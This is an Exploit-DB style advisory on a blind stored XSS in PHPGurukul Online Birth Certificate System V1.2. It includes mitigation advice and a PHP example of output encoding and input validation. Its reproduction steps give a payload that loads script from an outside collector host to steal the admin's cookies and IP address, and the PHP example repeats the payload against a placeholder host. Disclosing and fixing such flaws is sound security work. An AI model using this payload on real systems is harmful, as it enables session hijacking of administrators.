Vendor: Online Birth Certificate System
By: Prasheek Kamble
CVSS: 8.8 (HIGH)
Vulnerability type: Blind XSS
CWE: 79
Product Name: Online Birth Certificate System
Affected Version From: V 1.2
Affected Version To: V 1.2
Patch Exists: NO
Related CWE:
CPE: a:phpgurukul:online_birth_certificate_system
Metasploit:
Other Scripts:
Platforms Tested: MAC OS, XAMPP
Year: 2022

PHPGurukul Online Birth Certificate System V 1.2 – Blind XSS

PHPGurukul Online Birth Certificate System V 1.2 is vulnerable to blind (stored) cross-site scripting. An attacker can exploit this by navigating to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php, filling in the form and entering an XSS payload in the address field. When the admin clicks on the submitted request to verify the form, the stored payload executes in the admin's browser and the attacker can obtain details of the victim such as IP address and cookies.

Mitigation:

Validate user input on the server side and HTML-encode stored values when they are written into the admin pages; together, input sanitisation and output encoding prevent this class of XSS.
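As an added example (not PHPGurukul's code), the unencoded rendering pattern the advisory describes beside the output-encoding and validation fix; the admin-page markup, function names and the hostname in the sample payload are assumptions.

```php
<?php
// Added example, not PHPGurukul's code: vulnerable vs hardened rendering of the
// stored address field on an admin verification page. Markup, function names
// and the hostname in the sample payload are assumptions.
declare(strict_types=1);

// Defence in depth: sent before any output, this CSP stops an injected
// <script src="https://..."> from loading even if an encoding call is missed.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");

// Output encoding: entity-encode every stored value at the point it is written
// into HTML, so <, >, " and ' can no longer close an attribute or open a tag.
function h(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Input validation in the form handler: addresses need letters, digits, spaces
// and light punctuation; angle brackets and quotes are rejected before storage.
function isPlausibleAddress(string $address): bool
{
    $address = trim($address);
    if ($address === '' || mb_strlen($address, 'UTF-8') > 200) {
        return false;
    }
    return preg_match('/^[\p{L}\p{N}\s,.\-\/#()]+$/u', $address) === 1;
}

// Vulnerable pattern the advisory describes: the stored value is interpolated
// into the admin's page unencoded, so a leading "> breaks out of the attribute.
function renderAddressCellUnsafe(string $address): string
{
    return "<td><input type=\"text\" value=\"$address\" readonly></td>";
}

// Hardened pattern: identical markup, value encoded on output.
function renderAddressCellSafe(string $address): string
{
    return '<td><input type="text" value="' . h($address) . '" readonly></td>';
}

// Constructed sample shaped like the advisory's payload, with a placeholder host.
$payload = '"><script src=https://attacker.invalid></script>';

echo renderAddressCellUnsafe($payload), PHP_EOL;   // attribute closed, script tag live
echo renderAddressCellSafe($payload), PHP_EOL;     // one inert, fully encoded string
var_dump(isPlausibleAddress($payload));            // rejected at input
var_dump(isPlausibleAddress('12 Station Rd, Pune 411001')); // accepted
```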

Exploit-DB raw data:

# Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
# Date: 2022-10-02
# Exploit Author: Prasheek Kamble
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
# Version: V 1.2
# Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
# Tested on MAC OS, XAMPP
Steps to reproduce:

1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
2) Fill in the form and enter the XSS payload "><script src=https://prasheekk05.xss.ht></script> in the address field
3) Click on Add Details and intercept the request in Burp Suite
4) The details are now submitted.
5) As soon as the admin (victim) receives the request and clicks on it to verify the form, the XSS payload fires.
6) The attacker now gets the victim's details, such as IP address, cookies, etc.
7) The attacker is therefore successful in obtaining the victim's IP address and other details.

# PoCs

https://ibb.co/kSxFp2g 
https://ibb.co/VvSVRsy  
https://ibb.co/mSGp4FX 
https://ibb.co/hXbJ9TZ 
https://ibb.co/M6vS08S